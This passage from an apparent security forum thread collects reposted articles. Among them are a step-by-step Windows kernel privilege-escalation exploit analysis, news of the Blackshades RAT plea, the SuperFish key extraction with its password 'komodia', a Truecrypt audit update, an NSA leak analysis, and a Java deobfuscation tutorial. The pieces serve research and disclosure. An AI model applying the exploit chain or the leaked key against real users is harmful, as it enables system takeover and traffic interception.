clipboard. Placing a bitmap handle to the clipboard. Closing the clipboard (munging the clipboard data). We then proceed with these steps to leak uninitialized data&colon; Reopen the clipboard. Place the special bitmap on the clipboard via SetClipboardData. Place some other required formats. Request data in the format of CF_DIB via GetClipboardData to convert the bitmap to DIB. We can repeat this procedure as many times as we wish. This allows us to reach a deterministic state in which the data being leaked is the same over and over again, giving us the certainty that at the leaked address will indeed be a valid object allocated. While this works, the fact that we have to use the clipboard also has some caveats. Calling CreateBitmap with these arguments is all it needs: hbm = CreateBitmap( 1, // width 1, // height 1, // planes 5, // bitsPerPel ppvBits ); Each bitmap that gets created has usually a BITMAP structure (userland) and a palette (in the kernel object) associated with it. Not in this case though; this bitmap will not have a palette associated and the fourth parameter, bitsPerPel, gets rounded up to 8 for some reason and will be saved in the BITMAP structure. When converting the bitmap to DIB, this is what happens in xxxBMPtoDIB: Figure 10: Inside xxxBMPtoDIB (click to open larger image in new window) This function takes the bitmap we put on the clipboard earlier and uses the bitsPerPel BITMAP structure member from userland to calculate the size of the DIB color table. Remembering that the maximum number of entries of a DIB with biBitCount = 8 is 256, we can calculate the size as follows: 0x100 * 4 (color table) + 0x28 (header size) + 0x4 ( imageSize )= 0x42c bytes Figure 11: More xxxBMPtoDIB action Later in xxxBMPtoDIB, the above allocated buffer gets passed to GetDIBitsInternal. GreGetDIBitsInternalWorker would be responsible for initializing the color table @ offset 0x28, but because it never reaches the code (the function fails in bIsCompatible at the beginning because the Bitmap has no palette associated with it), it is possible to leak up to 0x404 bytes of uninitialized memory since the first 0x28 bytes are initialized. This gives us enough power to read the internal object pointers of a palette and predict (or know) where the next palette gets allocated. By allocating palettes with 0xe5 entries and then deleting them again, we can force xxxBMPtoDIB to reuse the freed memory of the palette and leak the “this” pointer @ offset 0x88. 0x98 + 4 * 0xe5 = 0x42c bytes Once we have leaked the address of the target palette, we can just write it to the arbitraryFree member from the gestureInfo structure and call DestroyCursor to free the palette through CleanupCursorObject. One problem that all of these objects face is the issue that they do not get immediately freed, but instead get placed on the DeferredFreePool. This problem can be solved by allocating 32 objects of the desired size and then deleting them right after to trigger a call to nt!ExDeferredFreePool, which finally releases the object we want to replace. Figure 12: Clearing out the DeferredFreePool Replacing the palette with our fakepalette Luckily, there is a very convenient way to replace the freed palette: NtUserConvertMemHandle. This function copies the contents of a memory buffer from userland to kernelland on the PagedPool. The only thing we need to take into account is that the kernel buffer is not QWORD aligned, so the structure for the fakepalette has to be adjusted a little. The shellcode gets stored at the palette entries array @ offset 0x90 and overwrite the function pointer @ offset 0x60 to point to the array. It then executes it through NtGdiGetNearestPaletteIndex, but this doesn’t work because the PagedPool is not executable on Windows 8. This means that we have to disable SMEP first to execute our shellcode in userland. To achieve this, the report references Sebastian Apelt’s published Pwn2Own afd.sys privilege escalation write up. We have to write the address of the HalDispatchTable in our fakepalette @ offset 0x80, where the palEntries pointer resides. We can then read the function pointer at HalDispatchTable+0x18 (by GetPaletteEntries), namely nt!ArbAddReserved, to calculate the address of nt!KiConfigureDynamicProcessor and use the instructions at the end for our ROP gadget. Finally, we overwrite the QueryIntervalProfile pointer with the gadget (by SetPaletteEntries) and execute the shellcode. To recap, the provided example performed the following: Leak the address of a palette object via Clipboard format conversion. Create two Cursors, CursorA and CursorB. Call NtUserLinkDpiCursor to link the cursors together. Destroy and free CursorB via NtUserDestroyCursor. Create a gestureInfo object on the PagedSessionPool of size 0xa0 to replace the freed CursorB. Destroy and free CursorA via NtUserDestroyCursor and free the target palette through CleanupCursorObject. Call NtUserConvertMemHandle to replace the freed palette of size 0x42c. Leak nt!ArbAddReserved from HalDispatchTable to compute the rop gadget address and evade ASLR. Perform a write to nt!HalDispatchtable to overwrite the QueryIntervalProfile pointer with the gadget address from nt!KiConfigureDynamicProcessor as ROP entry point. Execute Single-Gadget-ROP to disable SMEP. Directly return from gadget to userland code and execute the shellcode. Shellcode: Replace current process token with token of the SYSTEM process. As you can see, this was quite the write up and amazing work from this researcher. Just another day at the office here at the Zero Day Initiative. Hope you enjoyed the work of this researcher as much as I did! Sursa: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Just-another-day-at-the-office-A-ZDI-analyst-s-perspective-on/ba-p/6710637#.VOaHEXWUfHw
  10. [h=1]Blackshades malware co-creator pleads guilty[/h]Kevin McCoy, USA TODAY 5:26 p.m. EST February 18, 2015 NEW YORK — Alex Yucel, the co-creator of the Blackshades malware that infected more than a half-million computers worldwide, pleaded guilty Wednesday in Manhattan federal court. The Swedish citizen faces up to 10 years in prison, plus thousands of dollars in forfeiture and restitution, for his role in a scheme federal investigators said distributed Blackshades to thousands of cybercriminals worldwide and harmed many computer users. In an alleged scheme that ran from 2010-2013, conspirators installed Blackshades' Remote Access Tool — RAT — on the computers of unsuspecting users. The $40 program enabled them to access and view the victims' files, documents and photos, record keystrokes, steal passwords and even use the machines' cameras to spy on users. Blackshades users often sent electronic ransom notes to extort payments from victims for releasing the computers from secret control. Prosecutors said one such note warned: "Your computer has basically been hijacked, and your private files stored on your computer has now been encrypted, which means that they are impossible to access, and can only be decrypted/restored by us." Yucel, 24, was arrested in Moldova in November 2013 and was subsequently extradited to the U.S. In an agreement with prosecutors, he pleaded guilty to one count of distributing malicious software during a 35-minute hearing before U.S. District Court Judge P. Kevin Castel. Evidence amassed by federal investigators showed Yucel hired administrators, a marketing director and customer service representatives to build his Blackshades business. The operation rang up sales to thousands of users in more than 100 countries, generating more than $350,000 by April 2014, prosecutors charged. Yucel, dressed in dark blue jail clothes, told Castel he had lived in Sweden and attended a university for two years as a computer science major. "I do actually want to plead guilty," said Yucel. "I knew that the program ... would be used to cause damage." Had he gone to trial, Manhattan Assistant U.S. Attorney Sarah Lai said the government would have introduced transcripts of electronic chats between Yucel and an undercover federal agent, Blackshades marketing material and evidence of data stolen from computers. Although Yucel faces a maximum 10-year prison term, prosecutors and defense attorney Bradley Henry reached a stipulated agreement to imprisonment from 70 to 87 months. The final decision, however, rests with Castel, who set a tentative sentencing date of May 22. Henry said he will seek authorization for Yucel to serve the prison sentence and the period of supervised release in Sweden. A ruling on that request would be decided by the Department of Justice's Office of Enforcement Operations. Michael Hogue, the other co-creator of the Blackshades RAT program, and Brendan Johnston, a former Blackshades administrator, previously pleaded guilty and are awaiting sentencing. Sursa: Blackshades malware co-creator pleads guilty Justitia pulii. Nu e corect.
  11. [TABLE=width: 100%] [TR] [TD]IT Service Desk S.C. KPMG ROMANIA SRL[/TD] [TD=align: right][TABLE] [TR] [TD] Vezi detalii companie[/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD][TABLE=width: 100%] [TR] [TD][TABLE=width: 100%] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR=class: impar] [TD=class: jd-content]Tip oferta[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]Job[/TD] [/TR] [TR=class: par] [TD=class: jd-content]Nivel cariera[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]Entry[/TD] [/TR] [TR] [TD=class: jd-content]Oras(e)[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]BUCURESTI [/TD] [/TR] [TR=class: par] [TD=class: jd-content]Domenii oferta[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]IT / Telecom [/TD] [/TR] [/TABLE] [/TD] [TD][/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD]IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:www.kpmg.com/ro/en/careers/careernews/pages/default.aspx Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easy with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess a very good time management and task follow-up skills. Moreover, should demonstrate rigor in his daily routine while treating all staff requirements with solicitude. Job objective The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems and determine source, and advice on appropriate action. Responsibilities: • Respond to requests for technical assistance in person, via phone, and email; • To assist end-users in all IT applications and equipment related issues; • Diagnose, resolve, document resolutions for future reference technical hardware and software issues; • Determine source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action; • Serve as liaison between staff and the IT department to resolve issues; • Perform hardware and software installations; • Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates; • To ensure, as part of the IT team, the proper operation of all IT and Telecommunication items /equipment; • To take part in the implementation of new IT applications and/or management information systems; • To contribute to the development, improvement and implementation of new IT policies within the Firm and to monitor staff compliance; • To provide full end-user support in using customized specific IT applications; • To deliver on the spot and / or regular IT assistance to staff. Required skills: • University degree in Information Technology or related sciences; • At least 2 years prior work experience as a member of a IT team; • Relevant work experience in hardware, software & communication troubleshooting; • Knowledge of Windows 7/8, Office Application - Microsoft certification desirable; Performance standard requirements: Core Competencies defined for Infrastructure staff (link) BestJobs: http://www.bestjobs.ro/locuri-de-munca-it-service-desk/215650/2[/TD] [/TR] [/TABLE] PS: Dati-mi CV-ul daca sunteti interesati.
  12. Extracting the SuperFish certificate By Robert Graham I extracted the certificate from the SuperFish adware and cracked the password ("komodia") that encrypted it. I discuss how down below. Note: this is probably trafficking in illegal access devices under the proposed revisions to the CFAA, so get it now before they change the law. I used ghetto reversing to find the certificate. It was really easy. As reported by others, program is packed and self-encrypted (like typical adware/malware). The proper way to reverse engineer this is to run the software in a debugger, setting break point right after it decrypts itself. The goal is to set the right break point before it actually infects your machine -- reversers have been know to infect themselves this way. The ghetto way is to just to run this on a machine, infecting yourself, and run "procdump" (by @markrussinovich) in order to dump the process's memory. That's what I did, by running the following command: procdump -am VisualDiscovery.exe super.dmp The proper reversing is to actually tear apart the memory structures. The ghetto reversing is to run strings. This is an ancient (mid-1980s) program that simple extracts human readable strings out of a binary file, discarding the rest. It's really a stupid simple program. strings super.dmp > super.txt At that point, I load the file super.txt into a text editor and searched for the string "PRIVATE KEY". Sure enough, it popped right up. It's actually located several times in the memory dump. At this point, I copied/pasted the certificate into a file super.pem. I them attempted to look at it using OpenSSL. However, I was presented with a password prompt. This file has been encrypted with a password. Okay, that's annoying, but that just means we need to crack the password. However, I can't find a password cracker on the Internet that handles SSL PEM files, so I wrote my own certificate password cracker. It's pretty ghetto, using the OpenSSL decrypt API in a single thread, so it's not pretty. But it's sufficient for my needs. The encryption is actually pretty good, meaning I can only do a couple hundred guesses per second. This means that there is no chance of brute-forcing any password longer than 5 characters (brute-force means to try all possible combinations), it'd take billions of years. Instead, I want to do a dictionary attack. This is where I load a file of common words and test them one-by-one to see if they work. I tried the small dictionary john.dict that comes with John-the-Ripper, and it didn't find anything. But of course, I don't need a real dictionary. The password is probably also in the clear in the memory dump. I could just use the file super.txt as my dictionary! I tried this, but it was taking a long time, with 150k unique lines of text. It'd take many hours to complete. To speed things up, I filtered the list for just lower-case words grep "^[a-z]$" super.txt | sort | uniq > super.dict This leaves a dictionary of only 2203 words. I ran my cracking tool, and found the password in 10 seconds, "komodia". Armed with this password, I continued where I left off with the openssl command-line tool and successfully decoded the certificate. I can now use this to Man-in-the-Middle people with Lenovo desktops (in theory, I haven't tried it yet). Note that the password "komodia" is suggestive -- that's a company that makes an SSL "redirector" for doing exactly the sort of interception that SuperFish is doing. They market it as security software so you can spy on your kids, and stuff. (BTW, thanks to @chigley101 for linking a download of the software. Also note that @supersat and @paul_pearce found the password before I did, though as far as I know they haven't published it). Sursa: http://blog.erratasec.com/2015/02/extracting-superfish-certificate.html
  13. Another update on the Truecrypt audit There's a story on Hacker News asking what the hell is going on with the Truecrypt audit. I think that's a fair question, since we have been awfully quiet lately. To everyone who donated to the project, first accept my apologies for the slow pace. I want to promise you that we're not spending your money on tropical vacations (as appealing as that would be). In this post I'd like to offer you some news, including an explanation of why this has moved slowly. For those of you who don't know what the Truecrypt audit is: in late 2013 Kenn White, myself, and a group of advisors started aproject to undertake a crowdfunded audit of the Truecrypt disk encryption program. To the best of my knowledge, this is the first time anyone's tried this. The motivation for the audit is that lots of people use Truecrypt and depend on it for their security and safety -- yet the authors of the program are anonymous and somewhat mysterious to boot. Being anonymous and mysterious is not a crime, but it still seemed like a nice idea to take a look at their code. We had an amazing response, collecting upwards of $70,000 in donations from a huge and diverse group of donors. We then went ahead and retained iSEC Partners to evaluate the bootloader and other vulnerability-prone areas of Truecrypt. The initial report was published here. That initial effort was Part 1 of a two-part project. The second -- and much more challenging part -- involves a detailed look at the cryptography of Truecrypt, ranging from the symmetric encryption to the random number generator. We had some nice plans for this, and were well on our way to implementing them. (More on those in a second.) Then in late Spring of 2014, something bizarre happened. The Truecrypt developers pulled the plug on the entire product -- in their typical, mysterious way. This threw our plans for a loop. We had been planning a crowdsourced audit to be run by Thomas Ptacek and some others. However in the wake of TC pulling the plug, there were questions. Was this a good use of folks' time and resources? What about applying those resources to the new 'Truecrypt forks' that have sprung up (or are being developed?) There were a few other wrinkles as well, which Thomas talks about here -- although he takes on too much of the blame. It took us a while to recover from this and come up with a plan B that works within our budget and makes sense. We're now implementing this. A few weeks ago we signed a contract with the newly formed NCC Group's Cryptography Services practice (which grew out of iSEC, Matasano and Intrepidus Group). The project will evaluate the original Truecrypt 7.1a which serves as a baseline for the newer forks, and it will begin shortly. However to minimize price -- and make your donations stretch farther -- we allowed the start date to be a bit flexible, which is why we don't have results yet. In our copious spare time we've also been looking manually at some portions of the code, including the Truecrypt RNG and other parts of the cryptographic implementation. This will hopefully complement the NCC/iSEC work and offer a bit more confidence in the implementation. I don't really have much more to say -- except to thank all of the donors for their contributions and their patience. This project has been a bit slower than any of us would like, but results are coming. Personally, my hope is that they'll be completely boring. Posted by Matthew Green at 4:17 PM Sursa: http://blog.cryptographyengineering.com/2015/02/another-update-on-truecrypt-audit.html
  14. When Cryptographic API Design Goes Wrong February 18, 2015 Ionu? Ambrosie Whether we like to admit it or not, failing to account for human factors and usability issues when designing secure systems can have unwanted consequences. And while Security Usability is a broad field, today I’d like to focus on what I like to call the [lack of] usability of [some] cryptographic APIs. A paper on SSL Certificate Validation To get my point across, I’d like to bring forth a paper written in 2012 by Martin Georgiev, Subodh Iyengar, Suman Jana, Rishita Anubhai, Dan Boneh, and Vitaly Shmatikov, called The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software.In this paper, the authors claim and empirically confirm that SSL certificate validation is completely broken in many security-critical applications and libraries, meaning that any SSL connection initiated from any of these applications and libraries is insecure against a man-in-the-middle attack.They credit these vulnerabilities to badly designed APIs of SSL implementations and data-transport libraries, which present developers with a confusing array of settings and options. Articol complet: http://securitycafe.ro/2015/02/18/when-cryptographic-api-design-goes-wrong/
  15. E pentru "siguranta noastra"
  16. Ba. Inainte de a face informatii publice aduceti si dovezi.
  17. If the NSA has been hacking everything, how has nobody seen them coming? As the Snowden leaks continue to dribble out, it has become increasingly obvious that most nations planning for "cyber-war" have been merely sharpening knives for what looks like an almighty gunfight. We have to ask ourselves a few tough questions, the biggest of which just might be: "If the NSA was owning everything in sight (and by all accounts they have) then how is it that nobody ever spotted them?” The Snowden docs show us that high value targets have been getting compromised forever, and while the game does heavily favour offence, how is it possible that defence hasn't racked up a single catch? The immediate conclusions for defensive vendors is that they are either ineffective or, worse, wilfully ignorant. However, for buyers of defensive software and gear, questions still remain. The last dump, published by The Spiegel on the 17th of January went by pretty quietly (compared to previous releases) but the PDFs released contain a whole bunch of answers that might have slipped by un-noticed. We figured it would probably be worth discussing some of these, because if nothing else, they shine a light on areas defenders might have been previously ignoring. (This is especially true if you play at a level where nation state adversaries form part of your threat model. (and, as the leaks show, NSA targets commercial entities like mobile providers, so it’s not just the domain of the spooks.) The purpose of this post isn’t to discuss the legality of the NSA's actions or the morality of the leaks, what we are trying to answer is: "Why did we never see it coming?" We think that the following reasons help to explain how this mass exploitation remained under the radar for so long: 1. Amazing adherence to classification/secrecy oaths; 2. You thought they were someone else; 3. You were looking at the wrong level; 4. Some beautiful misdirection; 5. They were playing chess & you were playing checkers; 6. Your "experts" failed you miserably. 1. Amazing adherence to classification/secrecy oaths; The air of secrecy surrounding the NSA has been amazingly impressive and until recently, they had truly earned their nickname of "No Such Agency." A large number of current speakers/trainers/practitioners in infosec have well acknowledged roots in the NSA. It was clear from their skill-sets and specialities that they were obviously involved with CNE/CNO in their previous lives. If one were to probe deeper, one could make even more guesses as to the scope of their previous activities (and by inference we would have obtained a low resolution snapshot of NSA activities) [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD] Dave Aitel Fuzzing & Exploit frameworks [/TD] [TD] Jamie Butler Rootkits & Memory Corruption [/TD] [TD] Charlie Miller Fuzzing & Exploitation [/TD] [/TR] [/TABLE] Reading through the Snowden documents, a bunch of "new" words has been introduced into our lexicon. Interdictionwas relatively unheard of, and the the word "implant" was almost never used in security circles, but has now fairly reliably replaced the ageing "rootkit". We have read the documents for a few hours and have adopted these words, but ex-NSA’ers have clearly lived with these words for years of their service. That the choice of wording has not bled far beyond the borders at Fort Meade is interesting and notable. It is an amazing adherence to classification and secrecy, deserves admiration and has likely helped the NSA keep some of its secrets to date. (This is to be expected when innovation occurs out of sight, terminology diverges. When GCHQ cryptographers conceived early public-key crypto they called it “non-secret cryptography”, however this was only revealed many years after “public-key” had become commonplace. Now that “implant” is in the public domain (and is associated with NSA), there seems little reason for vendors to continue with “rootkit”.) 2. You thought they were someone else; Skilled adversaries operating under cover of a rioting mob is hardly a new tactic, and when one considers how much "bot" related activity is seen on the Internet, hiding amongst it is an obviously useful technique. The dump highlights two simple examples where the NSA leverages this technique. Performing "4th party collection" we essentially have the NSA either passively, or actively stealing intelligence from other intelligence agencies performing CNE. The fact that the foreign CNE can be parasitically leeched, actively ransacked or silently repurposed, means that even attacks that use malware belonging to country-X, using TTP's that strongly point to country-X could just be activity that should be attributed to the 4th party collection program. Of course theres no need for the NSA to limit themselves to just making use of foreign intelligence agencies. ThroughDEFIANTWARRIOR you see them making active use of general purpose botnets too. With some details on how botnet hijacking works (sometimes in coordination with the FBI) their slides also offer telling advice on how to make use of this channel: This raises two interesting points that are worth pondering. The first (obvious) one, is that even regular cybercrime botnet activity could be masking a more comprehensive form of penetration and the second is how much muddier it makes the waters of attribution. For the past few years, a great deal has been made of how Chinese IP's have been hacking the Western World. When one considers that the same slide deck made it clear that China had by far the greatest percentage of botnets, then we are forced to be more cautious when attributing attacks to China just because they originated from Chinese IP’s. (We discussed our views on weakly evidenced China attribution previously [here] & [here]). 3. You were looking at the wrong level; A common criticism of the top tier security conferences is that they focus on attacks that are overly complex, while networks are still being compromised by un-patched servers and shared passwords. What the ANT catalogue and some of the leaks revealed, is that sensitive networks have more than enough reason to fear complex attacks too. One of the most interesting documents in this regard appears to be taken from an internal Wiki, cataloguing ongoing projects (with calls for intern development assistance). The document starts off strong, and continues to deliver: "TAO/ATO Persistence POLITERAIN (CNA) team is looking for interns who want to break things. We are tasked to remotely degrade or destroy opponent computers, routers, servers and network enabled devices by attacking the hardware using low level programming.” For most security teams, low level programming generally means shellcode and OS level attacks. A smaller subset of researchers will then aim at attacks targeting the Kernel. What we see here, is a concerted effort to aim "lower": "We are also always open for ideas but our focus is on firmware, BIOS, BUS or driver level attacks." The rest of the document then goes on to mention projects like: "we have discovered a way that may be able to remotely brick network cards... develop a deployable tool". "erase the BIOS on a brand of servers that act as a backbone to many rival governments" "create ARM-based SSD implants." "covert storage product that is enabled from a hard drive firmware modification" "create a firmware implant that has the ability to pass to and from an implant running in the OS" "implants for the newest SEAGATE drives..", "for ARM-based Hitachi drives", "for ARM-based Fujitsu drives", "ARM-Samsung drives".. "capability to install a hard drive implant on a USB drive" "pre-boot persistence.. of OSX" "EFI module.." "BERSERKR is a persistent backdoor that is implanted into the BIOS and runs from SMM" All of this perfectly aligns with the CNO/GENIE document which makes it clear that base resources in that project: "will allow endpoint implants to persist in target computers/servers through technology upgrades, and enable the development of new methodologies to persist and maintain presence within hard target networks". We have worked with a few companies who make religious use of whitelisting technologies and have dealt with some who would quickly discover altered system files on sensitive servers. We know a tinier subset of those who would verify the integrity of running hosts using offline examination but organizations that are able to deal with implanted firmware or subverted BIOSes are few and far between. In the absence of hardware based TPM's, this is currently a research grade problem that most people don’t even know they have. 4. Some beautiful misdirection; Even if we were completely underprepared as defenders, one would think that those cases where implants were communicating back to the NSA would have been discovered (even if by accident) sooner or later. Once more, the documents reveal why this would not have resulted in the classic "smoking gun”. A common IR process when an attack has been discovered is to determine where the exfiltrated data is going to. In the most simplistic case (or if big budget movies are involved) this simple step could allow an analyst to say: “The data from this compromised host is going to HOST_B in country_X. So country_X is the culprit.” Of course, since even spirited teenagers have been making use of "jump hosts" since the 90's, a variation on this would be not just to base the attribution on the location of HOST_B, but to observe who then accesses HOST_B to "collect the loot". (It's the sort of time you really want to be the "global passive adversary”). Even this would have tipped the NSA's hand sooner or later, and what we see from the docs is a clever variation on the theme: We see the use of an entire new protocol, called FASHIONCLEFT to effectively copy traffic off a network, attach metadata to it, then hide the packet within another packet allowed to exfil the targeted network. Tunnelling one type of traffic over another is not novel (although a 27 page interface control document for the protocol is cool) but this still leaves open the possibility that you would see victim_machine talking to HOST_X in Europe. This is where passive collection comes in.. This is beautiful! So the data is munged into any packet that is likely to make it out of the network, and is then directed past a passive collector. This means that we cant rely on the host the data was sent to for attribution, and even if we did completely own the last hop, to see who shows up to grab the data, we would be watching in vain, because the deed was done when the packets traversed a network 3 hops ago. This really is an elegant solution and a beautiful sleight of hand. With the NSA controlling tens of thousands of passive hosts scattered around the Internet, good luck ever finding that smoking gun! (in their own words) 5. They were playing chess & you were playing checkers; Whats very clear from the breadth of the information is just how out of their depth, so many of the other players at this table are. Many are hilariously outgunned, playing on a field that has already been prepared, using tools that have already been rigged... and whats worse, is that many of them don’t even know this. In 2010, we gave a presentation at the CCDCOE in Estonia to NATO folks. Our talk was titled: "Cyberwar - Why your threat model is probably wrong!" (The talk has held up relatively well against the revelations, and is worth a quick read, even thought it predated the discovery of STUXNET) One of the key take aways from the talk (aside from the fact that any expert who referred to DDoS attacks when talking about cyberwar should be taken with a pinch of salt) was that real attackers build toolchains. Using examples from our pen-testing past, we pointed out how most of the tools we built went into modular toolchains. We mentioned that more than anything else, robust toolchains were the mark of a "determined, sponsored adversary”. Our conclusions from the talk were relatively simple: The nature of the game still heavily favours offence, and attacker toolchains were likely much more complex than the "sophisticated attacks" we had seen to date. When you look at the Snowden documents, if there is one word they scream, its toolchains: If there are two words, its "sophisticated toolchains" The USA (and their Five Eyes partners) were clearly way ahead of the curve in spotting the usefulness of the Internet for tradecraft and, true to the motto of U.S cyber command have been expending resources to ensure "global network dominance". While organizations all over the world have struggled over the past few years to stand up SoC's (security operations centers) to act as central points for the detection and triage of attacks, the documents introduce us (for the first time) to its mirror image, in the form of a ROC: From [media-35654.pdf]: In terms of ROC capacity, the documents show us that in 2005, the ROC was 215 people strong running a hundred active campaigns per day - In 2005! (thats generations ago in Internet years). In an op-ed piece we penned for Al Jazeera in 2011, we mentioned that nation states following the headlines about the US training tons of cyber warriors (with the CEH certification of all things) would be gravely mistaken, that offensive capability had been brought to bear on nation-states, long before the official launch of US Cybercom and these docs validate those words. In fact, if you are a nation state dipping your toes in these waters, its worth considering the documented budgets for project GENIE which we mentioned earlier. With an admittedly ambitious stated goal to "plan, equip and conduct Endpoint operations that actively compromise otherwise intractable targets" we can guess that project GENIE would cost a bit. Fortunately, we don’t have to guess, and can see that in 2011, GENIE alone cost $615MM, with a combined headcount of about 1500 people. JUST. FOR. PROJECT. GENIE. Of course while debate rages about the morality of governments buying 0days (and while some may think this is a new concept) the same document shows that back in 2012, about $25MM was set aside for "community investment" & "covert purchases of software vulnerabilities". $25MM buys a whole lot of 3rd party 0day. The possibly asymmetric nature of cyberwar means that small players are able to possibly punch above their weight-class. What we see here, is proof positive that the biggest kid in the room has been working on their punching for a long time… 6. Your "experts" failed you miserably. The snowden leaks crossed over from infosec circles into the global zeitgeist which meant international headlines and soundbytes on CNN. This in turn has led to a sharp rise in the number of "CyberWar Experts" happy to trot out their opinions in exchange for their 15 minutes of fame.. VC funding is rushing to the sector and every day we see more silver bullets and more experts show up... but, it would behoove us to pause for a bit to examine the track records of these "experts". How did they hold up against yesterdays headlines? I have seen 6 figure consultants trying to convince governments that 0days are never used and have seen people talk of nation state hacking with nothing more than skinned metasploit consoles and modern versions of back-orrifice. How many of the global "threat intelligence" companies are highlighting TTPS actually in use by APEX predators (instead of merely spotting low hanging fruit). If they are not, then we need to conclude that they are either uninformed or complicit in deluding us and either option should cap the exorbitant fees many currently seek. Conclusion? The leaks give us an insight into the workings of a well refined offensive machine. The latest files show us why attributing attacks to the NSA will be difficult for a long time to come and why “safe from nation state adversaries” requires a great deal more work, by people who are qualified to do so.. If nothing else, the leaks reiterate the title from our 2010 talk.. “Cyberwar.. why your threat model is probably wrong” [if you enjoy this update, you really should subscribe to ThinkstScapes] Sursa: http://blog.thinkst.com/p/if-nsa-has-been-hacking-everything-how.html
  18. Automating Removal of Java Obfuscation By David Klein, 16 Feb. 2015 In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker and once the method is known, methodology can be developed to automate the process. Introduction Obfuscation is the process of hiding application logic during compilation so that the logic of an application is difficult to follow. The reason for obfuscation is usually a result of vendors attempting to protect intellectual property, but serves a dual purpose in slowing down vulnerability discovery. Obfuscation comes in many shapes and forms, in this post we focus on a particular subset: strings obfuscation; more specifically, encrypted string constants. Strings within an application are very useful for understanding logic, for example logging strings and exception handling is an excellent window into how an application handles certain state and can greatly speed up efforts to understand functionality. For more information on what obfuscation is within the context of Java, see [0]. Note that the following entry assumes the reader has a rudimentary understanding of programming. Decompilation Firstly, we extract and load the Java archive (jar) using the tool JD-GUI [1] (a Windows based GUI tool that decompiles Java “.class” files), this is done by drag-dropping the target jar into the GUI window. The following is what is shown after scrolling down to an interesting looking class: Figure 1 - JD-GUI showing the output from the disassembly The first observation we can make is that JD-GUI has not successfully disassembled the class file entirely. The obfuscator has performed some intentional modifications to the bytecode which has hampered disassembly. If we follow the sequence of events in the first z function we can see that it does not flow correctly, incorrect variables are used where they shouldn’t be, and a non-existing variable is returned. The second z function also seems very fishy; the last line is somehow indexing into an integer, which is definitely not allowed in Java. Screenshot shown below. Figure 2 - Showing the suspicious second 'z' function Abandoning JD-GUI and picking up trusty JAD [2] (a command line Java .class decompiler) yields better results, but still not perfect: Figure 3 - Showing the output that JAD generates We can see that disassembly has failed as JAD inserts the JVM instructions (as opposed to high level Java source); in fact JAD tells us as such in the command line output. Fortunately it appears that the decoding failures only exist in a consistent but limited set of functions and not the entire class. Secondly, we can see that the strings are not immediately readable; it is quite obvious that there is some encryption in use. The decryption routine appears to be the function z, as it is called with the encrypted string as the input. As shown in Figure 2 there are two functions sharing the name (z), this is allowed in Object Oriented languages (Function Overloading [3]) and it is common for obfuscators to exploit such functionality. It is however possible to determine the true order of the called functions by looking at the types or the count of the parameters. Since our first call to z provides string as the parameter, we can derive the true order and better understand its functionality. We can see in Figure 4 (below) that the first z converts the input string ‘s’ to a character array: if the length of the array is 1 it performs a bitwise XOR with 0x4D, otherwise it returns the char array as-is. JAD was unable to correctly disassemble the function, but in this case such a simple function is easy to analyse. Figure 4 - Showing the first 'z' function The second z function (seen in Figure 5 below) appears to be where the actual decryption is done. Figure 5 - Second 'z' function, highlighting the interesting integer values To know what happens with the input we must understand that Java is a stack based language. Operations are placed on the stack and operated upon when unrolled. The first important instruction we see is that the variable i is set to 0; we then see the instruction caload, which loads a character from an array at a given index. While JAD has not successfully decompiled it, we can see that the index is the variable i and the array is the input character array ac (and in fact, ac pushed onto the stack at the very start of our function). Next, there is a switchstatement, which determines the value of byte0. After the switch statement, byte0 is pushed onto the stack. For the first iteration, its value will be value 0x51. The proceeding operations perform a bitwise XOR between the byte0 value and the character in ac at index i, Then i is incremented and compared with the length of ac, if the index is greater than the length of ac, the ac array is converted to a string and returned, if the index is less thank the length of ac the code jumps back to L3 and performs another iteration on the next index. In summary, this z function takes the input and loops over it, taking the current index within the input and performing a bitwise XOR against a key that changes depending on the current index. We also note that there is a modulus 5 function involved against the current index, indicating that there are 5 possible keys (shown in red in Figure 5). To neaten this up, we will convert the second z to pseudocode: keys = [81,54,2,113,77] // below input is "#Sq\0368#Ug\002b\"Oq\005(<\030r\003\"!Sp\005$4E" input = [ 0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 0x24, 0x34, 0x45 ] for i in 0..input.length-1 do printf "%c" (keys[i%keys.length] ^ input) As you can see from the above code, it converts to a simple loop that performs the bitwise XOR operation on each character within theinput string; we have replaced the switch with an index into the keys array. The code results in the string "resources/system.properties" being printed - not at all an interesting string - but we have achieved decryption. Problem analysis With knowledge of the key and an understanding of the encryption algorithm used, we should now be able to extract all the strings from the class file and decrypt them. Unfortunately this approach fails; this is a result of each class file within the Java archive using a different XOR key. To decrypt the strings en-masse, a different approach is required. Ideally, we should programmatically extract the key from every class file, and use the extracted key to decrypt the strings within that file. One approach could be to perform the disassembly using JAD, and then write a script to 